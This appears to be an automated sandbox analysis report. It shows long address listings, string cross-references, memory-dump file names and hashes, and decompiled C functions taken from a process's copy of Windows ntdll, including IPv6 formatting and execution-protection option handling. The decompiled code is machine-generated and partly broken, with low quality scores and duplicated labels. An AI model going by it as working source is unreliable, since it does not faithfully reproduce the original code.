                                                                                                                                                                                    0x02678852
                                                                                                                                                                                    0x02678b49
                                                                                                                                                                                    0x02678858
                                                                                                                                                                                    0x0267886c
                                                                                                                                                                                    0x0267886c
                                                                                                                                                                                    0x02678872
                                                                                                                                                                                    0x026c1b0e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678878
                                                                                                                                                                                    0x02678881
                                                                                                                                                                                    0x0267888b
                                                                                                                                                                                    0x0267888e
                                                                                                                                                                                    0x02678891
                                                                                                                                                                                    0x02678896
                                                                                                                                                                                    0x02678899
                                                                                                                                                                                    0x02678899
                                                                                                                                                                                    0x0267889e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026c1b21
                                                                                                                                                                                    0x026c1b27
                                                                                                                                                                                    0x026c1b2e
                                                                                                                                                                                    0x026c1b42
                                                                                                                                                                                    0x026c1b44
                                                                                                                                                                                    0x026c1b44
                                                                                                                                                                                    0x026c1b4c
                                                                                                                                                                                    0x026c1b4f
                                                                                                                                                                                    0x026c1b55
                                                                                                                                                                                    0x026c1b55
                                                                                                                                                                                    0x026788a4
                                                                                                                                                                                    0x026788aa
                                                                                                                                                                                    0x026788b1
                                                                                                                                                                                    0x026788c5
                                                                                                                                                                                    0x026c1b5b
                                                                                                                                                                                    0x026c1b5b
                                                                                                                                                                                    0x026788c5
                                                                                                                                                                                    0x026788ce
                                                                                                                                                                                    0x026788e0
                                                                                                                                                                                    0x026788e5
                                                                                                                                                                                    0x026788e8
                                                                                                                                                                                    0x026788e8
                                                                                                                                                                                    0x026788ee
                                                                                                                                                                                    0x02678900
                                                                                                                                                                                    0x02678900
                                                                                                                                                                                    0x02678905
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02678905

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 026789FC
                                                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 026787E6
                                                                                                                                                                                    • WindowsExcludedProcs, xrefs: 026787C1
                                                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02678914
                                                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 02678827
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                                                    • Opcode ID: e46a1ae339fd99995f7ddbeaf5ed63e53100d4ceb3598e88a5dc41a634c376af
                                                                                                                                                                                    • Instruction ID: d3f70581a9894a53d6ae1f6a95cb04599f08f1087e17da9d3ee2128f5e7caa15
                                                                                                                                                                                    • Opcode Fuzzy Hash: e46a1ae339fd99995f7ddbeaf5ed63e53100d4ceb3598e88a5dc41a634c376af
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F115B2D00209EFCF11EF98D9849EEBBB9FF08304F1444AAE905A7211E7319A45DF64
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                    			E026913CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                    				char _t90;
                                                                                                                                                                                    				signed int _t91;
                                                                                                                                                                                    				signed int _t96;
                                                                                                                                                                                    				intOrPtr _t108;
                                                                                                                                                                                    				signed int _t114;
                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                    				intOrPtr _t128;
                                                                                                                                                                                    				intOrPtr* _t129;
                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t129 = _a4;
                                                                                                                                                                                    				_t128 = _a8;
                                                                                                                                                                                    				_t116 = 0;
                                                                                                                                                                                    				_t71 = _t128 + 0x5c;
                                                                                                                                                                                    				_v8 = 8;
                                                                                                                                                                                    				_v20 = _t71;
                                                                                                                                                                                    				if( *_t129 == 0) {
                                                                                                                                                                                    					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                                    						if(_t96 != 0) {
                                                                                                                                                                                    							L38:
                                                                                                                                                                                    							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                    								_t86 = E02687707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                    								L36:
                                                                                                                                                                                    								return _t128 + _t86 * 2;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                                    						if(_t114 == 0) {
                                                                                                                                                                                    							L33:
                                                                                                                                                                                    							_t115 = 0x2652926;
                                                                                                                                                                                    							L35:
                                                                                                                                                                                    							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                    							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                    							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                    							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                    							_t86 = E02687707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t114 != 0xffff) {
                                                                                                                                                                                    							_t116 = 0;
                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						if(_t114 != 0) {
                                                                                                                                                                                    							_t115 = 0x2659cac;
                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L33;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					L5:
                                                                                                                                                                                    					_a8 = _t116;
                                                                                                                                                                                    					_a4 = _t116;
                                                                                                                                                                                    					_v12 = _t116;
                                                                                                                                                                                    					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                                    						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                                    							_v8 = 6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t90 = _v8;
                                                                                                                                                                                    					if(_t90 <= _t116) {
                                                                                                                                                                                    						L11:
                                                                                                                                                                                    						if(_a8 - _a4 <= 1) {
                                                                                                                                                                                    							_a8 = _t116;
                                                                                                                                                                                    							_a4 = _t116;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                    						if(_v8 <= _t116) {
                                                                                                                                                                                    							L22:
                                                                                                                                                                                    							if(_v8 < 8) {
                                                                                                                                                                                    								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                    								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                    								_t128 = _t128 + E02687707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							return _t128;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							L14:
                                                                                                                                                                                    							L14:
                                                                                                                                                                                    							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                                    								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                                    									_push(":");
                                                                                                                                                                                    									_push(_t71 - _t128 >> 1);
                                                                                                                                                                                    									_push(_t128);
                                                                                                                                                                                    									_t128 = _t128 + E02687707() * 2;
                                                                                                                                                                                    									_t71 = _v20;
                                                                                                                                                                                    									_t130 = _t130 + 0xc;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t78 = E02687707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                                    								_t130 = _t130 + 0x10;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_push(L"::");
                                                                                                                                                                                    								_push(_t71 - _t128 >> 1);
                                                                                                                                                                                    								_push(_t128);
                                                                                                                                                                                    								_t78 = E02687707();
                                                                                                                                                                                    								_t130 = _t130 + 0xc;
                                                                                                                                                                                    								_t91 = _a8 - 1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                    							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                                    							_t71 = _v20;
                                                                                                                                                                                    							if(_t91 >= _v8) {
                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t116 = 0;
                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t108 = 1;
                                                                                                                                                                                    						_v16 = _t129;
                                                                                                                                                                                    						_v24 = _t90;
                                                                                                                                                                                    						do {
                                                                                                                                                                                    							if( *_v16 == _t116) {
                                                                                                                                                                                    								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                                    									_a4 = _v12;
                                                                                                                                                                                    									_a8 = _t108;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_t116 = 0;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_v12 = _t108;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_v16 = _v16 + 2;
                                                                                                                                                                                    							_t108 = _t108 + 1;
                                                                                                                                                                                    							_t26 =  &_v24;
                                                                                                                                                                                    							 *_t26 = _v24 - 1;
                                                                                                                                                                                    						} while ( *_t26 != 0);
                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}




















                                                                                                                                                                                    0x026913d5
                                                                                                                                                                                    0x026913d9
                                                                                                                                                                                    0x026913dc
                                                                                                                                                                                    0x026913de
                                                                                                                                                                                    0x026913e1
                                                                                                                                                                                    0x026913e8
                                                                                                                                                                                    0x026913ee
                                                                                                                                                                                    0x026be8fd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be921
                                                                                                                                                                                    0x026be921
                                                                                                                                                                                    0x026be928
                                                                                                                                                                                    0x026be982
                                                                                                                                                                                    0x026be98a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be99a
                                                                                                                                                                                    0x026be99e
                                                                                                                                                                                    0x026be9a3
                                                                                                                                                                                    0x026be9a8
                                                                                                                                                                                    0x026be9b9
                                                                                                                                                                                    0x026be978
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be978
                                                                                                                                                                                    0x026be98a
                                                                                                                                                                                    0x026be92a
                                                                                                                                                                                    0x026be931
                                                                                                                                                                                    0x026be944
                                                                                                                                                                                    0x026be944
                                                                                                                                                                                    0x026be950
                                                                                                                                                                                    0x026be954
                                                                                                                                                                                    0x026be959
                                                                                                                                                                                    0x026be95e
                                                                                                                                                                                    0x026be963
                                                                                                                                                                                    0x026be970
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be975
                                                                                                                                                                                    0x026be93b
                                                                                                                                                                                    0x026be980
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be980
                                                                                                                                                                                    0x026be942
                                                                                                                                                                                    0x026be94b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be94b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026be942
                                                                                                                                                                                    0x026913f4
                                                                                                                                                                                    0x026913f4
                                                                                                                                                                                    0x026913f9
                                                                                                                                                                                    0x026913fc
                                                                                                                                                                                    0x026913ff
                                                                                                                                                                                    0x02691406
                                                                                                                                                                                    0x026be9cc
                                                                                                                                                                                    0x026be9d2
                                                                                                                                                                                    0x026be9d2
                                                                                                                                                                                    0x026be9cc
                                                                                                                                                                                    0x0269140c
                                                                                                                                                                                    0x02691411
                                                                                                                                                                                    0x02691431
                                                                                                                                                                                    0x0269143a
                                                                                                                                                                                    0x0269143c
                                                                                                                                                                                    0x0269143f
                                                                                                                                                                                    0x0269143f
                                                                                                                                                                                    0x02691442
                                                                                                                                                                                    0x02691447
                                                                                                                                                                                    0x026914a8
                                                                                                                                                                                    0x026914ac
                                                                                                                                                                                    0x026be9e2
                                                                                                                                                                                    0x026be9e7
                                                                                                                                                                                    0x026be9ec
                                                                                                                                                                                    0x026bea05
                                                                                                                                                                                    0x026bea05
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02691449
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x02691449
                                                                                                                                                                                    0x0269144c
                                                                                                                                                                                    0x02691459
                                                                                                                                                                                    0x02691462
                                                                                                                                                                                    0x02691469
                                                                                                                                                                                    0x0269146a
                                                                                                                                                                                    0x02691470
                                                                                                                                                                                    0x02691473
                                                                                                                                                                                    0x02691476
                                                                                                                                                                                    0x02691476
                                                                                                                                                                                    0x02691490
                                                                                                                                                                                    0x02691495
                                                                                                                                                                                    0x0269138e
                                                                                                                                                                                    0x02691390
                                                                                                                                                                                    0x02691397
                                                                                                                                                                                    0x02691398
                                                                                                                                                                                    0x02691399
                                                                                                                                                                                    0x026913a1
                                                                                                                                                                                    0x026913a4
                                                                                                                                                                                    0x026913a4
                                                                                                                                                                                    0x02691498
                                                                                                                                                                                    0x0269149c
                                                                                                                                                                                    0x0269149f
                                                                                                                                                                                    0x026914a2
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026914a4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026914a4
                                                                                                                                                                                    0x02691413
                                                                                                                                                                                    0x02691415
                                                                                                                                                                                    0x02691416
                                                                                                                                                                                    0x02691419
                                                                                                                                                                                    0x0269141c
                                                                                                                                                                                    0x02691422
                                                                                                                                                                                    0x026913b7
                                                                                                                                                                                    0x026913bc
                                                                                                                                                                                    0x026913bf
                                                                                                                                                                                    0x026913bf
                                                                                                                                                                                    0x026913c2
                                                                                                                                                                                    0x02691424
                                                                                                                                                                                    0x02691424
                                                                                                                                                                                    0x02691424
                                                                                                                                                                                    0x02691427
                                                                                                                                                                                    0x0269142b
                                                                                                                                                                                    0x0269142c
                                                                                                                                                                                    0x0269142c
                                                                                                                                                                                    0x0269142c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0269141c
                                                                                                                                                                                    0x02691411

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: b64e1f8de69ebab3c2c4376c0ab72414c1baffbbfe9c94637bce75ebd5557163
                                                                                                                                                                                    • Instruction ID: f903f03c72faa05484f120629e7869aac5465c379abbeb58ba6cb55b55e51a9f
                                                                                                                                                                                    • Opcode Fuzzy Hash: b64e1f8de69ebab3c2c4376c0ab72414c1baffbbfe9c94637bce75ebd5557163
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C613971D00656A6DF25DF59C8808BEBBB9EF9A300B64C16DE4AA47740DB35A640CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                    			E02687EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				char _v540;
                                                                                                                                                                                    				unsigned int _v544;
                                                                                                                                                                                    				signed int _v548;
                                                                                                                                                                                    				intOrPtr _v552;
                                                                                                                                                                                    				char _v556;
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                    				unsigned int _t46;
                                                                                                                                                                                    				unsigned int _t47;
                                                                                                                                                                                    				unsigned int _t52;
                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                    				unsigned int _t62;
                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                    				signed int _t73;
                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t33 =  *0x2732088; // 0x7774a876
                                                                                                                                                                                    				_v8 = _t33 ^ _t73;
                                                                                                                                                                                    				_v548 = _v548 & 0x00000000;
                                                                                                                                                                                    				_t72 = _a4;
                                                                                                                                                                                    				if(E02687F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                                    					__eflags = _v548;
                                                                                                                                                                                    					if(_v548 == 0) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t62 = _t72 + 0x24;
                                                                                                                                                                                    					E026A3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                                    					_t71 = 0x214;
                                                                                                                                                                                    					_v544 = 0x214;
                                                                                                                                                                                    					E0265DFC0( &_v540, 0, 0x214);
                                                                                                                                                                                    					_t75 = _t74 + 0x20;
                                                                                                                                                                                    					_t46 =  *0x2734218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                                    					__eflags = _t46;
                                                                                                                                                                                    					if(_t46 == 0) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t47 = _v544;
                                                                                                                                                                                    					__eflags = _t47;
                                                                                                                                                                                    					if(_t47 == 0) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					__eflags = _t47 - 0x214;
                                                                                                                                                                                    					if(_t47 >= 0x214) {
                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_push(_t62);
                                                                                                                                                                                    					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                                    					E026A3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                                    					_t52 = E02660D27( &_v540, L"Execute=1");
                                                                                                                                                                                    					_t76 = _t75 + 0x1c;
                                                                                                                                                                                    					_push(_t62);
                                                                                                                                                                                    					__eflags = _t52;
                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                    						E026A3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                                    						_t71 =  &_v540;
                                                                                                                                                                                    						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                                    						_t77 = _t76 + 0x14;
                                                                                                                                                                                    						_v552 = _t56;
                                                                                                                                                                                    						__eflags = _t71 - _t56;
                                                                                                                                                                                    						if(_t71 >= _t56) {
                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							L10:
                                                                                                                                                                                    							_t62 = E02668375(_t71, 0x20);
                                                                                                                                                                                    							_pop(_t69);
                                                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    								 *_t62 = 0;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							E026A3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                                    							_t77 = _t77 + 0x10;
                                                                                                                                                                                    							E026CE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                                    							__eflags = _t62;
                                                                                                                                                                                    							if(_t62 == 0) {
                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                                    							_t71 = _t31;
                                                                                                                                                                                    							__eflags = _t71 - _v552;
                                                                                                                                                                                    							if(_t71 >= _v552) {
                                                                                                                                                                                    								goto L1;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                    					_push(3);
                                                                                                                                                                                    					_push(0x55);
                                                                                                                                                                                    					E026A3F92();
                                                                                                                                                                                    					_t38 = 1;
                                                                                                                                                                                    					L2:
                                                                                                                                                                                    					return E0265E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L1:
                                                                                                                                                                                    				_t38 = 0;
                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                    			}



























                                                                                                                                                                                    0x02687f08
                                                                                                                                                                                    0x02687f0f
                                                                                                                                                                                    0x02687f12
                                                                                                                                                                                    0x02687f1b
                                                                                                                                                                                    0x02687f31
                                                                                                                                                                                    0x026a3ead
                                                                                                                                                                                    0x026a3eb4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a3eba
                                                                                                                                                                                    0x026a3ecd
                                                                                                                                                                                    0x026a3ed2
                                                                                                                                                                                    0x026a3ee1
                                                                                                                                                                                    0x026a3ee7
                                                                                                                                                                                    0x026a3eec
                                                                                                                                                                                    0x026a3f12
                                                                                                                                                                                    0x026a3f18
                                                                                                                                                                                    0x026a3f1a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a3f20
                                                                                                                                                                                    0x026a3f26
                                                                                                                                                                                    0x026a3f28
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a3f2e
                                                                                                                                                                                    0x026a3f30
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026a3f3a
                                                                                                                                                                                    0x026a3f3b
                                                                                                                                                                                    0x026a3f53
                                                                                                                                                                                    0x026a3f64
                                                                                                                                                                                    0x026a3f69
                                                                                                                                                                                    0x026a3f6c
                                                                                                                                                                                    0x026a3f6d
                                                                                                                                                                                    0x026a3f6f
                                                                                                                                                                                    0x026ae304
                                                                                                                                                                                    0x026ae30f
                                                                                                                                                                                    0x026ae315
                                                                                                                                                                                    0x026ae31e
                                                                                                                                                                                    0x026ae321
                                                                                                                                                                                    0x026ae327
                                                                                                                                                                                    0x026ae329
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026ae32f
                                                                                                                                                                                    0x026ae32f
                                                                                                                                                                                    0x026ae337
                                                                                                                                                                                    0x026ae33a
                                                                                                                                                                                    0x026ae33b
                                                                                                                                                                                    0x026ae33d
                                                                                                                                                                                    0x026ae33f
                                                                                                                                                                                    0x026ae341
                                                                                                                                                                                    0x026ae341
                                                                                                                                                                                    0x026ae34e
                                                                                                                                                                                    0x026ae353
                                                                                                                                                                                    0x026ae358
                                                                                                                                                                                    0x026ae35d
                                                                                                                                                                                    0x026ae35f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026ae365
                                                                                                                                                                                    0x026ae365
                                                                                                                                                                                    0x026ae368
                                                                                                                                                                                    0x026ae36e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x026ae374
                                                                                                                                                                                    0x026ae32f
                                                                                                                                                                                    0x026a3f75
                                                                                                                                                                                    0x026a3f7a
                                                                                                                                                                                    0x026a3f7c
                                                                                                                                                                                    0x026a3f7e
                                                                                                                                                                                    0x026a3f86
                                                                                                                                                                                    0x02687f39
                                                                                                                                                                                    0x02687f47
                                                                                                                                                                                    0x02687f47
                                                                                                                                                                                    0x02687f37
                                                                                                                                                                                    0x02687f37
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 026A3F12
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 026A3F75
                                                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 026A3F4A
                                                                                                                                                                                    • ExecuteOptions, xrefs: 026A3F04
                                                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 026A3EC4
                                                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 026AE345
                                                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 026AE2FB
                                                                                                                                                                                    • Execute=1, xrefs: 026A3F5E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.2361587097.0000000002640000.00000040.00000001.sdmp, Offset: 02630000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.2361574580.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362039928.0000000002720000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362066586.0000000002730000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362087025.0000000002734000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362111006.0000000002737000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362129389.0000000002740000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000007.00000002.2362314296.00000000027A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                    • API String ID: 3901378454-484625025
                                                                                                                                                                                    • Opcode ID: 89ab73d9e69a9ccea68ff835158dd9dcc8daa6454a98494d792979d858ae0ef5
